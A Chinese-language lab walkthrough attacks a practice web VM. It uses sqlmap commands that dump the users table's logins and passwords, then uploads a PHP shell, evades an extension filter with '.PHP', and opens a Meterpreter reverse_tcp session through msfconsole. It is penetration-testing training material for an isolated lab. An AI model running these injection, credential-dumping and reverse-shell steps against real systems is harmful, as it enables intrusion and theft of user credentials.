web靶机系列-GET参数注入

主机:192.168.136.133
靶机:192.168.136.143
用nmap、dirb扫描靶机
web靶机系列-GET参数注入
web靶机系列-GET参数注入
发现有一个网址http://192.168.136.143/admin登陆进去,发现有登陆页面
web靶机系列-GET参数注入
试用常规的弱口令进行测试发现都不行,转换思路,看看有没有其他漏洞可入侵
用owasp-zap扫描
web靶机系列-GET参数注入
发现有sql注入
利用sqlmap -u http://192.168.136.143/cat.php?id=3 –dbs
web靶机系列-GET参数注入
有两个数据库
再用sqlmap -u http://192.168.136.143/cat.php?id=3 -D information_schema –tables查看一下information_schema,表太多,直接看下一个有什么。
web靶机系列-GET参数注入
sqlmap -u http://192.168.136.143/cat.php?id=3 -D photoblog –tables
web靶机系列-GET参数注入
看到有users的表,可能存在登陆账户和密码
sqlmap -u http://192.168.136.143/cat.php?id=3 -D photoblog -T users –columns
web靶机系列-GET参数注入
查看login和password
sqlmap -u http://192.168.136.143/cat.php?id=3 -D photoblog -T users -C “login,password” –dump
web靶机系列-GET参数注入
看到了登陆账号和密码,返回登陆页面。登陆进去,在new picture选项发现有可上传选项
web靶机系列-GET参数注入
web靶机系列-GET参数注入
接下来构造shell并写一个php文本上传
web靶机系列-GET参数注入
web靶机系列-GET参数注入
用msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.136.133
开始run监听
web靶机系列-GET参数注入
上传发现出现这个页面
web靶机系列-GET参数注入
可能被防火墙过滤,改.PHP
web靶机系列-GET参数注入
反弹shell成功
web靶机系列-GET参数注入